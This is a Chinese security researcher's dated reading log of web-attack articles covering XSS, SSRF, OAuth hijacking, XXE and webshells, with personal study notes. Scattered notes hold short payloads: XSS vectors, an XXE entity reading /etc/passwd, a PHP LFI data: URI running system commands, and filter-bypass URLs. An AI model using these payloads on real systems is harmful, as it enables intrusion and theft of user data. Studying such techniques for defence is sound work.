【XSSI,不同于xss,这个是通过在我们的网站嵌入“目标站点”的指定JavaScript文件,如果这个JavaScript文件能够读取或者存储了用户的敏感数据,我们就可以在我们自己的网站上通过用户自己来加载该脚本,获取到数据】 ##例子 ##JavaScript prototype ##javascript必知必会之prototype 【自身声明的方法和属性是 静态的, 也就是说你在声明后,试图再去增加新的方法或者修改已有的方法,并不会 对由其创建的对象产生影响, 也即 继承 失败;而prototype可以动态地增加新的方法或者修改已有的方法, 从而是 动态的 ,一旦 父函数对象 声明了相关 的prototype属性,由其创建的对象会 自动继承 这些prototype的属性.】 ##Commix:Detecting & Exploiting Command Injection Flaws. 【挺不错的工具...】 11.16--------------------------------------------------------- ##JavaScript's Built-In Function(s) --- A Potential XSS Venue 【"xxxxxxxx'yyyyy</img decodeURI、window.location.replace、replace (JavaScript String replace Method) xss还是二哥的文章好】 ##XSS to RCE in Atlassian Hipchat 11.15--------------------------------------------------------- 一下部分链接丢失,完整链接在:http://todaro.lofter.com/post/307c4c_64f91bf ##Http Response Splitting - Validate link 【靠的是细心】 ##addtoany-share-buttons-wordpress-plugin-dom-based-xss 11.13--------------------------------------------------------- ##使用QQ邮箱漏洞盗取iCloud解锁失窃iPhone团伙溯源 11.12--------------------------------------------------------- ##Lib之过?Java反序列化漏洞通用利用分析 【然而看不懂........】 ##Unauthenticated Stored Credential Recovery and Remote Command Execution on Jenkins ##Two cross-protocol MitM attacks on browsers 11.11--------------------------------------------------------- ##乌云爆告之双十一电商的安全警示 ##帝友P2P借货系统全局问题造成多处注入之2(无视360防御/gpc/受长度限制) 11.10--------------------------------------------------------- ##redis配置不当可导致服务器被控制 11.9----------------------------------------------------------- ##protecting-windows-networks-defeating-pass-the-hash ##国家某局linux主机应急支援记录 11.6----------------------------------------------------------- ##C&C控制服务的设计和侦测方法综述 11.5----------------------------------------------------------- ##我是如何窃取已登陆用户163/126 邮件的 11.3----------------------------------------------------------- ##A Tale of Breaking SAP's SuccessFactors's XSS Filter ##The Fool, The BeEF and The Butcher ##恶意代码清除实战 ##Data mining for security at Google(未) 11.2----------------------------------------------------------- ##HTTP Evasions Explained - Part 2 - Deflate Compression ##HTTP Evasions Explained - Part 3 - Chunked Transfer ##HTTP Evasions Explained - Part 4 - Doubly Compressed Content ##HTTP Evasions Explained - Part 5 - GZip Compression ##HTTP Evasions Explained - Part 6 - Attack of the White-Space 【head、浏览器、firewall不得不说的二三事....】 ##QQ邮箱Flash跨域数据挟持(可蠕虫、收发邮件、查看好友列表等) 10.31--------------------------------------------------------- ##音悦台主站XSS(进击吧XSS之Rootkit的奇袭) 10.29--------------------------------------------------------- ##Data mining firewall logs : Principal Component Analysis 【数据分析 有一天会用的上的】 ##How to run Principal Component Analysis with RapidMiner - Part 2 ##Javascript缓存投毒学习与实战 ##XSS in YouTube Gaming 10.26--------------------------------------------------------- ##Weird New Tricks for Browser Fingerprinting 【和以前看过的利用CSP来验证用户是否登录fb和用css验证用户是否登录过某些网站有点类似,不过这个算是多个技术的连用,属于升级版!】 10.23--------------------------------------------------------- ##Hiding Webshell Backdoor Code in Image Files 10.22--------------------------------------------------------- ##P2P金融安全之互贷网任意账户密码重置漏洞(非爆破真实账号演示) 【最近session紊乱的例子有点多】 ##解决工控网络通信协议威胁的实践 10.21--------------------------------------------------------- ##某电商网站流量劫持案例分析与思考 10.20--------------------------------------------------------- ##[技术解析]一份Archmake.COM的渗透测试报告 ##GamerAshy-封堵某国7xxx部队 10.19--------------------------------------------------------- ##渗透测试:反弹与转发小结 ##论黑产黑阔如何安全地转移赃款/洗钱? ##每一个程序员都是黑客 【利用正则匹配所花的时间来猜测token值。】 ##威胁情报&基础数据 ##揭秘:钓鱼攻击工具包Angler Exploit Kit初探 ##Exploit kit roundup: Less Angler, more Nuclear 10.16--------------------------------------------------------- ##New Methods in Automated XSS Detection & Dynamic Exploit Creation 10.15--------------------------------------------------------- ##On (OAuth) token hijacks for fun and profit part #1 (Google/Microsoft integration) 【还是redirect_uri配置的太宽泛,再配合referer】 ##On (OAuth) token hijacks for fun and profit part #2 (Microsoft/xxx integration) ##ThinkPHP留后门技巧 10.14--------------------------------------------------------- ##CRH取票终端机跳出漏洞目测全国通用第二波(非图片/ windows帮助按钮绕过) ##IIS写权限利用续以及写权限漏洞来由解释 ##伽利略远程监控系统完全安装指南 10.13--------------------------------------------------------- ##知乎某处OAuth的身份劫持漏洞 ##域渗透的金之钥匙 10.12--------------------------------------------------------- ##Threat Intel | Web Crew ##A close look at an operating botnet ##WordPress 利用 XMLRPC 高效爆破 原理分析 ##Resin漏洞利用案例之目录遍历/以金蝶某系统为例 10.11--------------------------------------------------------- ##playing with facebook<->microsoft,youtube,nest,vimeo and parse oauth 【当重定向遇到OAuth确实可以玩出不一样的东西,这个属于是网站自己的问题。还有一个问题就是网站在提供redirect_url给开放OAuth认证的网站的时候,由于登记的不严谨,导致二级域名、二级目录等也能认证成功,这时候如果二级域名或者二级目录有重定向漏洞,也可以把Token给传出去。还有一个,OAuth遇到json的时候,也就是SOME攻击,这个也很好玩。】 ##Linux PAM&&PAM后门 ##通过dns进行文件下载 10.10--------------------------------------------------------- ##微信公众号管理员后台点击我发的消息链接,公众号介绍等设置就会被修改(绕过csrf防护) 【referer坏事...】 ##INDETECTABLES RAT 10.9----------------------------------------------------------- ##地方商业银行APP安全性分析 ##How I Hacked Hotmail 【说到底还是token没校验正确,属于OAuth+CSRF连用的攻击方式】 ##window.opener.location 安全风险讨论 【又看到这个了,不过这个属性很早就有说过之后会废弃】 10.8----------------------------------------------------------- ##A comprehensive study of Huawei 3G routers - XSS, CSRF, DoS, unauthenticated firmware update, RCE ##How I could hack internet bank accounts of Danish largest bank in a few minutes ##Maneuvering Around Clouds:Bypassing Cloud-based Security Providers 10.3----------------------------------------------------------- ##Bypassing IE's XSS Filter with HZ-GB-2312 escape sequence 9.30----------------------------------------------------------- ##LFI with PHPInfo本地测试过程 ##Watering Holes and Malvertising: Uncovering the Root Cause of Compromise (Part 1) ##Watering Holes and Malvertising: Uncovering the Root Cause of Compromise (Part 2) ##设置用于研究的wireshark ##通过PHP反序列化进行远程代码执行 9.28----------------------------------------------------------- ##WireShark黑客发现之旅(6)—“Lpk.dll劫持+ 飞客蠕虫”病毒 9.26----------------------------------------------------------- ##Github Hacking 【另一个大code查询:https://searchcode.com/】 ##Mobile Ad Networks as DDoS Vectors: A Case Study 【通过向网站中注入广告,广告引入js,js中写的是向目标网站请求数据,当用户访问有该广告的网站时,用户就会自动请求目标网站的数据,当用户足够多时,就会造成ddos现象!】 ##An introduction to JavaScript-based DDoS 9.25-------------------------------------------------------------- ##reGeorg+proxychains-ng组合试用 【reGeorg默认当前只支持apache中间件的网站!】 ##利用被入侵的路由器迈入内网 ##通过一糯米XSS可绕chrome并可用两种方式拿到httponly的BDUSS(大部分非IE用户点击后百度云盘资料会被泄露) 9.24-------------------------------------------------------------- ##Building An Rdio Flash Cross-domain Exploit with FlashHTTPRequest (crossdomain.xml Security) ##FlashHTTPRequest工具地址 ##Crossdomain.xml Hacking – Proof of Concept Tool ##CSRF in partners.facebook.com##CSP-The Unexpected Eval 【jQuery的XHR,jQuery.ajax请求后获取到的内容会被直接执行】 ##An Introduction to Content Security Policy 【介绍csp的,浅显易懂!】 ##linux下隐藏账号/发现隐藏的账号 ##伪装QQ红包&绕过URL检测 ##被人遗忘的Memcached内存注射 【Memcached中以\r\n来分割不同的命令,如果直接将用户输入的数据进行查询,可以造成注入;xxx%00查询的命令】 9.23-------------------------------------------------------------- ##浅析大规模DDOS防御架构-应对T级攻防 ##ThinkPHP设计缺陷导致逻辑漏洞造成密码找回绕过等问题 ##U-mail邮件系统又一getshell ##U-Mail邮件系统批量getshell(真正无限制,无需普通帐号) 9.22-------------------------------------------------------------- ##74cms 两处二次注入 9.21-------------------------------------------------------------- ##SSRF案例三部曲之1 ##SSRF案例三部曲之2 ##SSRF案例三部曲之3 9.20-------------------------------------------------------------- ##phpmyadmin+udf ##傲游浏览器最新版远程代码执行附过程分析 9.18-------------------------------------------------------------- ##黑产无间道:黑产威胁情报工作实战 ##Dark Fairytales from a Phisherman (Vol. II) ##QQ邮箱重要参数暴露致安全性低下#附EXp ##How To Shot Web 【真心好文章】 ##Web Hacking 中的奇技淫巧 ##Bugzilla CVE-2015-4499: All Your Bugs Are Belong To Us 【该系统在用户注册时,如果用户的名称超过255字节,就会进行截断存储,然后下发对应的token,用户点击后就能激活。于是,注册一个a[a....a]@target_site.com.attacker.com的用户名,这时候会被截断成a[a....a]@target_site.com,然后下发token给a[a....a]@target_site.com.attacker.com这个我们可控的用户,一旦我们点击激活,我们就拥有了target_site.com这个域名的权限了!】 ##WEB前端攻擊與防禦 ##CTF For Beginner 9.17-------------------------------------------------------------- ##黑客 色情 黑公关 中国互联网的三大地下世界 【唔....】 ##Finding Vulnerabilities in Core WordPress: A Bug Hunter’s Trilogy, Part III – Ultimatum 【因为支持短标签,所以可以在短标签中构造一个合法的其他标签(如<a>标签),然后再闭合短标签,最后再加上我们的payload。通过利用短标签在渲染时的闭合问题来实现payload的插入。】 ##链家旗下自如某站一个有意思的文件包含到简单内网渗透(本地文件包含getshell技巧) ##Bypassing the TYPO3 Core XSS Filter ##PfSense XSS漏洞分析 9.16-------------------------------------------------------------- ##Abusing Windows Opener to Bypass CSRF Protection 【这个是在前端验证window.opener不能为NULL,默认的csrf-poc是直接打开的,没有父页,所以window.opener为NULL,所以能够拦截csrf攻击。但是,可以通过两个页面来实现绕过这个验证,第一个页面添加<a href="poc.html" _target=blank>指向第二个页面poc.html,第二个页面为POC页面。这时候从第一个页面点击超链接跳转至poc.html时,第二个页面的window.opener就不为空了,这时是指向第一个页面,所以绕过了前端的值不能为NULL的限制】 ##PHP/Sqlite下常见漏洞浅析 - PHP/Sqlite Vulnerability Cheat Sheet 【query与exec】 ##Web渗透中的反弹Shell与端口转发 9.15-------------------------------------------------------------- ##ECSHOP某二次注入利用姿势研究 【思路灵活】 ##书安-第一期 ##Performing UDP tunneling through an SSH connection ##DNSViz is a tool suite for analysis and visualization of Domain Name System (DNS) behavior ##【安天CERT】大量HFS搭建的服务器被黑客利用进行恶意代码传播 ##利用被入侵的路由器获取网络流量 9.14----------------------------------------------------------------- ##Cross-domain Timing Attacks Against Lucene 【熵值,猜测】 ##HTTP Evader - Automate Firewall Evasion Tests 9.13----------------------------------------------------------------- ##Jam Wifi with wifi Jammer in Kali linux Step by Step ##Setting Up A DMZ on ESXi 5.5, with PfSense ready for a honeypot ##Go Hack Yourself - 10 Pen Test Tactics for Blue Teamers 9.12------------------------------------------------------------------ ##Mitigating JavaScript context Cross-Site Scripting in PHP ##Time-Based Username Enumeration: Practical or Not? 【默认情况下,找回密码就能枚举存在的用户;在这招失效的情况下,通过验证“请求登录返回数据的时间”来判定用户名是否存在,理想情况下,存在的用户所花费的时间会更长。】 ##Advanced SQL Injection ##Crossed by Cross-Site-Scripting: Exploring the Impact of XSS ##轻量级的蜜罐,适合部署在甲方,简单防护 ##道高一尺,墙高一丈:互联网封锁是如何形成的 9.11------------------------------------------------------------------- ##Ebay: From CSRF to Full Takeover Account of any user 【重新绑定不用验证原来的吗。。。】 ##Google:From Privilege Escalation Vulnerability to Full Takeover Account ##Yahoo! SSRF/XSPA Vulnerability ##Facebook’s Parse OAuth2 Bug 【OAuth+二级域名+重定向】 9.10------------------------------------------------------------------- ##中国人民保险用户任意密码重置漏洞 ##国资背景p2p安全之贷贷兴隆存在设计缺陷可重置任意账户密码(悄无声息的秒改) 【密码重置 session紊乱】 【细节如下:第一个窗口先使用自己的手机找回密码,通过短信验证后,进入修改页面此时停住;在同一个浏览器新开第二个窗口进行密码找回,这里输入要被攻击者的手机号只需点获取验证码,然后停住;回到第一个窗口,填写后提交,就能修改第二个窗口中用户的密码】 9.9--------------------------------------------------------------------- ##EVADING ALL WEB-APPLICATION FIREWALLS XSS FILTERS ##Tomcat安全配置 9.8--------------------------------------------------------------------- ##微博上你点我发的链接我就可以登上你的微博(web版和app端均可两个漏洞一并提交) ##利用Weblogic进行入侵的一些总结 ##奇技淫巧:没有密码且不借助工具临机控制Win7 ##轻量级的蜜罐,适合部署在甲方,简单防护 9.8--------------------------------------------------------------------- ##OAuth security ##How I hacked Github again. ##聊着聊着我就上了你……的微信(两处都可以劫持微信登录的漏洞) 【token、get、referer(超链接/img标签)】 ##隐私泄露杀手锏 —— Flash 权限反射 9.7--------------------------------------------------------------------- ##“短信拦截马”黑色产业链与溯源取证研究 ##木马的前世今生:上线方式的发展及新型上线方式的实现 9.6--------------------------------------------------------------------- ##Nginx解析漏洞的利用和修复方法 ##steal-login-data-on-checkout.paypal.com 【可遇不可求,挺好的,细致加细致】 ##xss-on-google-plus 7.17------------------------------------------------------------------- Hacking Facebook’s Legacy API, Part 1: Making Calls on Behalf of Any User 【 挺有意思的,做测试的时候,一直开着burp,后面再对请求进行仔细的查看。通过查看流量,发现了一些api请求,之后测试api的其他请求,发现能够成功,最后发现facebook默认的把所有人的权限授权给mobile这个app,导致可以对其他人的账号进行操作。】 7.8------------------------------------------------------------------- 我是如何黑掉英国间谍软件公司Gamma的 [ 好文章!!!] 6.17------------------------------------------------------------------- 【实战篇】没有绝对安全的系统:记一次服务器沦陷后的分析 【 linux下如何发现入侵以及发现rootkit。】 http://drops.wooyun.org/papers/4544 5.24------------------------------------------------------------------- 好久没更新,最近比较忙啊。 xss auditor bypass1 xss auditor bypass2 <svg><script>/<1/>alert(document.domain)</script></svg> 4.27------------------------------------------------------------------- 竞争上传 【 有点意思,通过同一时间对同一个请求发送多次,如果服务器没有处理好请求,会导致一些问题。】 4.24------------------------------------------------------------------- 微博上点开我发的链接我就可登进你的淘宝支付宝和微博可盗号可挂马 【 主要是以下几个问题的集合利用: 1.重定向 2.CSRF 3.Auth 4.双因子认证 几个点: 1.受害者一定要登陆淘宝 2.替换二维码的唯一标识,让受害者提交我们的唯一标识到服务器,以获取受害者权限与我们的用户名相绑定 3.绕过双因子认证 漏洞利用: <1>让用户先登录淘宝:通过新浪微博的淘宝快捷登录的api请求,该api可以指定登录成功后跳转的淘宝地址。 <2>登录后跳转到淘宝地址,需要让用户访问我们的poc页面,所以还要寻找一个淘宝下的重定向链接,重定向到poc页面。 <3>poc页面利用二维码登录无Token保护,发送带有我们的标识的二维码登录请求到淘宝,淘宝返回授权码。 <4>利用该授权码请求Auth认证,获取淘宝的所有访问权限。 <5>异地登录需要双因子验证,通过需找SSO下权限设置不同步的问题,寻找不需要双因子认证的点去访问特定页面。 】 4.22------------------------------------------------------------------- ##Twitter, HTTP Response Splitting ##twitter-crlf-injection 【 推特的某个广告页面 对用户输入的数据没有进行编码,就添加到Set-Cookie中(但是过滤某些字符)。导致了使用unicode+utf-8编码构造出一个“560A”这样的字符,之后56被过滤掉,留下了0A,造成了CRLF,之后的页面内容都是我们能控制的。个例。】 hacking-networks-with-snmp xssi攻击(Cross Site Script Inclusion) 【 日本人好猥琐,他们可以通过在浏览器中用script标签来包含一个csv文件,然后通过在js中预定义一些变量来检测csv中是否有该字符,当然还有通过一些字符集编码的转换来导致内容溢出 不过这个利用场景真的是太小了吧!!先不说你知不知道用户有哪些csv文件,再者说了,一个csv文件那么多内容,真的能猜解完??......】 4.21------------------------------------------------------------------- 看我如何一步步沦陷一个游戏企业(手游安全案例) 【 还是挺有意思的,截断客户端请求,发现服务器地址,然后直接对服务器地址进行渗透。。。】 JSON如果响应XML内容会带来的问题 【 服务端接收JSON数据请求 如果没有做很好的限制,可能允许响应XML内容,这时会导致XXE注入 向服务器请求JSON数据的时候,改成Content-Type: application/xml 然后将JSON数据改成xml格式,如: <?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE netspi [<!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <root> <search>name</search> <value>&netspi;</value> </root> 】 Understanding Server-Side Request Forgery 【 其实就是利用ssrf这个特性做成内网代理工具。】 利用DNS rebinding获取WIFI密码 【 1.某个用户访问了我的恶意网站,缓存了一个恶意脚本(TTL为60s),该恶意脚本是获取用户的内网ip,并且探测特定的应用,例子中给的是B&O(一个音响设备,连接到WIFI中,并且明文储存WIFI密码....),直接嵌入一个img标签去请求该应用特定的文件,有就返回端口和ip。 此时用户一直在浏览网站,全然不知道发生了什么 2.然后我恶意的将我的域名地址改成用户的内网地址 3.Js的ttl时间超时,重新请求我的网站的ip,这时js请求http://我的网站/1000/Bo_network_settings.asp,实际是请求http://获取的内网ip//1000/Bo_network_settings.asp(这个是存储明文密码的地方)。由于网站的域名还是我的域名,所以浏览器会认为是同源的,于是我们能够获取用户请求返的回数据的内容。 解决方法: 用DNS pinning能够防止这种攻击(浏览器不管TTL超时时间,本地缓存一个DNS-IP表,直到浏览器进程关掉才清空),因为一旦第一次缓存到DNS-IP的对应,就不会再更改。 poc在这里 】 天天网任意重置用户账号密码之第三弹 【 有点意思啊,这种密码重置的,要绕过的话,关键还是看服务器响应的内容,然后做对应的测试。】 4.20------------------------------------------------------------------- 仅Chrome有效的xss向量: <input type="search" onsearch=prompt(1) autofocus> <details ontoggle=confirm(1)> <button autofocus onfocus=alert(1)> 4.17------------------------------------------------------------------- 乌云多数已修复SSRF漏洞可被绕过+外网域名如何解析到内网IP 【 BMa解释的已经很清楚了。 1、如果请求的是域名,则向公网DNS进行查询,获取ip访问地址,但是返回的地址没有进行校验是否是内网地址(内网地址的请求是要被禁止的!),于是,我们就可以想办法让DNS查询返回的ip地址是内网地址,刚好某些网站就有提供该服务... 2、如果直接是基于ip地址的,就判断是否是内网ip,是的话就不返回查询,其实这里如果没做好,是会有很多问题的,各种前端技巧。 按我的意思来说,基于域名的,则通过DNS查询后再判断是否是内网地址。判断是否是内网地址的时候,一定要注意各种前端技巧。获取域名的话,要获取//到/中的内容,再去判断。 】 play_xxe 【 再看一遍。。】 4.16------------------------------------------------------------------- server-side-request-forgery-ssrf 【 比较全面的讲解了ssrf,当做复习吧。】 dridex-code-breaking-modify-the-malware-to-bypass-the-vm-bypass 【 很好的恶意软件分析文章】 flash rootkit+二哥的flash rootkit+例子1+例子2+例子3+例子4+ XSCH攻击+实例解析【Flash跨域数据劫持漏洞】 【 主站点的crossdomain设置成允许*.domain.com,造成只要在domain.com下的任意子域名可以读取目标站点的数据。通过在该domain.com下找到一个网站,并且上传包含flash代码的jpg文件(可允许上传的后缀名)等,如果数据的内容没有被很好的检查,将导致我们的flash代码能够与目标站点进行通信。最后我们通过在本地object中包含该文件,将获取主站点的数据! 攻击流程如下: 1、在目标站点允许的跨域网站的任何子域名上传包含向目标站点通信的flash代码的任意后缀名的文件; 2、受害者登录该目标站点; 3、我们的网站通过object包含在第一步上传的含有flash代码的文件。受害者访问我们的网站的时候,将会以受害者的身份请求该上传文件,通过该上传文件与目标站点通信,再返回给我们的网站,造成信息泄露! 修复方法: 1、允许跨域访问的网站一定要慎重(这个是关键点)! 2、对于上传的文件,最好的情况是检查其内容。 <object id="xxxx" type="application/x-shockwave-flash" data="swf的地址" width="0" height="0"> 再看二哥的flash rootkit的时候,他侧重于通过flash的函数来说明这个攻击能实现的原因。 】 易班主站SQLi影响全国大部分高校学生 【 ok,只说一个点,fuzz的这个吧。。。】 4.14------------------------------------------------------------------- 百度任意XSS绕过HTTPONLY BDUSS 【 百度检测链接中(-1 == u.indexOf('javascript'))没有javascript,但是完全没有考虑到大小写的情况,直接u=JaVascript就绕过了。】 乐视网首页某处xss可导致rootkit(绕过) 【 】 4.13------------------------------------------------------------------- Safari出现严重跨域漏洞 【 这种漏洞也是醉了。safari在对ftp协议的处理上是有很大的问题的,ftp://user%40ftp.attacker.tld%2Fexploit.html%23@apple.com/这样的链接会被safari进行urldecode,变成ftp://user@ftp.attacker.tld/exploit.html#@apple.com/,到这一步的话,正常也是识别为ftp.attacker.tld这个域名。但是最奇葩的是document.domain居然是指向apple.com。。。。。】 360极速浏览器7.5及以下版本同源策略实现漏洞可以查看其他网站密码 【 这个属于二进制挖掘的内容了,但是毕竟是浏览器安全,也算是前端安全吧。本地数据库读取的时候,由于匹配不够精确,导致类似存储在www.1.org.cn这样的网站上的本地密码,会被www.1.org读取并自动填写上。】 4.12------------------------------------------------------------------- facebook-bug-bounty-clickjacking 【 之前就看过,也知道的一种攻击技巧,就国内来说,这种攻击基本上市不设防的,没有为什么!通过防止网站被嵌套(基于协议的X-Frame-­Options-deny或者是检查top的框架是不是本身,否则就将其引导到自己的网站这两种方法),可以避免这种攻击】 http://www.paulosyibelo.com/2015/01/facebooks-oculus-exploiting.html 4.8------------------------------------------------------------------- 126/163邮箱正文存储型XSS 【 chrome浏览器36之后的一个link导入特性,<link rel=import href=http://xxx/xss.html>,xss.html内容:<?php header("Access-Control-Allow-Origin: *");?><script>alert(location.host);</script>】 4.4------------------------------------------------------------------- 利用百度输入法绕过windows登录和提权服务器 【 这种输入法应用,导致一些字词联想可以借由浏览器打开,浏览器再打开cmd,验证就被绕过了,可遇不可求。】 4.3------------------------------------------------------------------- alictf-2015 【 因为有去看过题目(WEB),但是当时知识欠缺,没绕过,补充下这个知识点:在svg的script标签下,浏览器是可以认识实体编码的,但是;(分号)不能丢,于是<svg><script>&# 97;&# 108;&# 101;&# 114;&# 116;&# 40;&# 49;&# 41;</script>是可以的。】 4.2------------------------------------------------------------------- 百度某个从SSRF到内网WebShell 【 一哥先是发现了一个ssrf的点(百度有一个api调试的功能,但是请求数据的时候没有过滤,导致了ssrf问题),然后通过这个点去请求内网中的web(通过之前的内网地址泄露或者自己爆破都可以),然后发现了一个wordpress,接着对这个wordpress进行爆破(?author=*获取用户名称,再弱口令爆破),获取了后台权限。然后本地写了一个php中转脚本,简化请求,获得了webshell。】 asia-15-Johns-Client-Side-Protection-Against-DOM-Based-XSS-Done-Right-(tm) 【 结合之前看的,要bypass auditor,就要不引起auditor的注意,这时候,可以利用浏览器的一些属性,比如location.hash.slices()会获取#后面的字符串,而浏览器是不过滤#后面的字符的! 总的来说吧,就是一个关键字要从链接或者属性或者其他地方或者拆分来获取,而不是直接传进去。要是直接传进去,80%(我估计的)会马上被auditor发现并拦截!】 总结Web应用中基于浏览器的安全漏洞 【 这个应该称为浏览器应用的安全问题,而不是浏览器问题。比较有意思的一个点是对一些登录页面(已经提交过请求的),在成功后,如果按后退键再刷新的话,数据是会被再次发送一次的,这其中会不会出现什么问题呢,值得思考。】 ncc-group-graduate-solution-challenge-2-unknown-data 【 获取到了一个无后缀的未知文件,通过linux的:file 文件名,得知其是zip文件后解压,再file之后得到一个ssh的rsa凭证,以及pcap数据包。通过分析数据包,得到了mysql的端口,最后通过内网中的一台机器进行端口转发来连接内网的另一台机器】 ssh [email protected] -i rsa文件 -p 2224 -L 2250:192.168.120.1:21 -N -v 4.1------------------------------------------------------------------- interesting-xml-processing-in-copypaste-in-word-and-outlook 【 作者发现在ms office或者outlook中会解析DTD中的xml文件,从而造成xml拒绝服务攻击(通过插入重复的实体),但是作者也指出,他不能在该xml中引用外部实体,或者读取超出PATH(我们的path环境)外的文件,因为:.被禁用了。 刚好2015 blackhat asia的那个议题也有说到复制到剪切板的内容,其格式也会被复制下来(比如DTD文件中的xml样式表),包括mario(3.31的文章)也有指出。 所以总的来说,一个是剪切板可以将原来的文字的样式都保存下来,另外一个是app的解析带来的问题。】 critical-vulnerabilities-in-json-web-token-libraries 【 json搭建的网站的token验证有很大的问题,一个是token的算法只能是两个HS256(SHA256)或者none(已经验证过的),并且是验证token的时候先验证算法。所以这样带来的问题是攻击者可以自己指定算法,这时候如果我们将算法设置成none,然后再将signature设置成空,再稍微修改一下payload,那么我们就通过验证了,可以获取任意权限。 说是这么说,没有玩过json,权当看过知道这个知识点吧,作者指出这是json web token的构建问题,需要重构。。。。。】 3.31------------------------------------------------------------------- 剪切板带来的跨站脚本(mario出品)+中文例子解析 【 开源软件,如odt文件。我们在该软件上生成的odt文件,将其解压之后,会有一个style.xml文件,我们通过修改其中的font-family属性,构造xss语句,最后再压缩成zip,再改成odt文件后再打开,然后复制其中的文字到浏览器,开源导致xss。其中有一个细节是浏览器有一个剪切板内容初始化功能,开源通过svg标签bypass。 其他还有pdf、ms office文件、xps等都可以构造这样的xss。 毕竟是别人发现的,何时能有这样的功底呢。。。】 3.30------------------------------------------------------------------- 从TCL某漏洞看内网渗透教学分享之内网信息探测和后渗透准备 【 从web撕开口子,进内网,代理出来,进行端口扫描,跨网段渗透。】 .user.ini文件构成的PHP后门 【 某网站限制不允许上传.php文件,你便可以上传一个.user.ini,再上传一个图片马,包含起来进行getshell。不过前提是含有.user.ini的文件夹下需要有正常的php文件,否则也不能包含了。wamp不支持。】 Alibaba CTF 2015 - XSS400 WriteUP 【 新学了一个姿势,在chrome下,可以通过利用chorm-filter的拦截特性来覆盖js中的变量。http://url/1.php?id=1&a=<script>var imageData = {name: "Oreo"}</script>会触发 Chrome 过滤器令源码中的对应代码段var imageData = {name: "Oreo"}失效】 blackhat-asia-15-Prado-Browsers-Gone-Wild 【 算是中规中矩吧,都是一些已经存在的问题。punycode带来的url的欺骗+利用data属性和html5的download属性和js的自动加载来下载文件+css的url链接颜色判断访问了那些网站+浏览器拖拽带来的问题。】 web攻击日志分析之新手指南 【 挺好的,学点运维相关的。】 3.26------------------------------------------------------------------- 腾讯OAuth平台redirect_uri过滤不严可能导致用户信息遭窃取 【 对第三方授权返回的域名没有进行严格校验,主要是没考虑到浏览器的特性(http://www.baidu.com\www.qq.com/匹配的是百度而不是QQ)】 腾讯OAuth平台 redirect_uri 过滤不严可能导致用户信息遭窃取(二) 【 修补后被绕过,主要还是浏览器的特性问题导致的(http://www.qq.com@www.baidu.com匹配的是www.baidu.com,@前面的是用户,后面的是域名)。】 腾讯OAuth平台redirect_uri过滤不严可能导致用户信息遭窃取(三) 【 这个特性我就不知道了,safari会对url中的full width字符自动转化为常见的字符, 比如下面这个url:http://www.wooyun.org会跳转到http://www.wooyun.org。】 腾讯OAuth平台redirect_uri过滤不严可能导致用户信息遭窃取(四)【疑问】 【 redirect_uri=http%3A%2F%[email protected]&state=048cf6b68d98606939f0287860c53235,这个真的能吗? 】 3.25------------------------------------------------------------------- 根据mysql报错进行回显注入的原理 【 哈哈哈哈哈,今天终于把mysql的报错注入的方法搞懂了,以后可以快乐的手注了。。。】 php LFI读php文件源码以及直接post webshell 【 哈哈哈,ctf的姿势还是很有趣的啊!!通过:1.php?page=php://filter/read=convert.base64-encode/resource=../路径/文件来读取php文件,这个之前就已经知道了。另外一个姿势是:1.php?page=data:text/plain,<?php system("uname -a");?>直接执行命令等。】 通过微信公众号获取大量优酷内部员工敏感信息/定向钓鱼风险 【 再次验证了“任何输入都是有害的”这句话。 在做微信公众号服务的时候,接口没有正确的验证过滤用户的非法输入,导致了数据库注入。】 3.22------------------------------------------------------------------- http://blog.mindedsecurity.com/ 某浪DOM_XSS-2 【 ^(http|https):\/\/([^\/\?#]+.sina.com)这个正则表达式由于只保证//到.com中没有/?#,但是并没有过滤“\”,所以我们可以构造http://www.bad.com\sina.com/,这样,匹配了是sina.com,但是却指向bad.com。 正确的过滤还需过滤\,^(http|https):\/\/([^\/\?#\]+.sina.com) 】 某浪DOM_XSS-3 【 其实2的时候,我就注意到urlAllowDomain和srcAllowDomain中的正则没有正确匹配开头和结尾,srcAllowDomain = ['sina.com.cn','weibo.com','sinaimg.cn'],导致可以构造如下的绕过方式:http://xsina.com.cn】 傲游云浏览器可被中间人攻击 【 一开始我是看不懂的,因为描述的天花乱坠的,再加上我对https的信息加密有错误的认识,最后在百度然后和blue叔叔讨论过之后,才真的明白这漏洞到底到底说的是什么。 这个漏洞要描述的问题的实质是:遨游浏览器针对框架引用的网站嵌入(如img、iframe等),并没有严格的校验证书,也没有提醒用户危险性,导致用户可被假的证书欺骗,并且是毫无察觉的被获取cookie。 之前认为只要是https的数据,无论哪里抓都是加密的,其实是错的,只有在出网卡的时候,数据才是加密的,所以如果你在登录的时候,直接burp抓是明文的,但是如果你用wireshark抓的话,是可以抓到的(应用层数据不加密,网络层才加密)。然后数据到达”证书颁发者“,加密的数据才被解密,最后进行数据的验证。 由于对证书不进行验证+不进行安全提醒,那么我就可以进行中间人攻击(连入我控制的wifi)。由于数据都是经由我转发的,通过Fiddler(这个是能下发自己证书的吧,我是这么认为的)来抓取数据,下发的证书直接被浏览器认可,这时候Fiddler再抓到数据,就可以进行破解了。 总的来说,这个确实是算浏览器的漏洞。但是说到中间人攻击的话,ether fream的降https还是更厉害的。】 3.20------------------------------------------------------------------- gongshangyinhang安全控件可导致远程任意代码执行(新型技术点) 【 应用申请了过高的权限,篡改了IE的安全配置,将gongshangyinhang的https域加入IE的可信任域中,将淘宝的很多域也加到里面去了,甚至其中还有http的域。 这样做的危害是:1、擅自修改了IE的安全配置成自定义,加入了这些域,万一要是这些域存在xss,那么将会影响所有网站的安全。2、因为申请了太高权限,会导致任意代码执行。3、将http加入信任域,将会导致中间人问题。】 3.19------------------------------------------------------------------- hacking-stackoverflow-com-s-html-sanitizer 【 挺有意思的,受益匪浅。 作者通过分析dom,发现网站使用HTML sanitizer来解析标签,这套解析方案中是禁止了<img>标签的,不过是不够严谨吧,通过fuzz,作者使用<img ̊(这里的 ̊)这样的方案来绕过黑名单。 对我来说最大的收益是,我使出吃奶的力气把正则看完了(以前是很抗拒的,因为看不懂,但是最近感觉好像又到了一个瓶颈了,接下来得开始研究代码了),顺带着学习了一点正则的知识,以后继续慢慢补充,不然bypass都看不懂,不知道在干什么了。】 xss-via-a-spoofed-react-element 【 挺好的,作者通过提交不合规的json数据(如需要数字的地方,输入字符串;在需要字符串的地方,输入数组等)来返回数据,然后查看返回的数据中哪些被拦截了,哪些被正确返回了,再决定下一步的测试向量。 作者发现hackone使用了 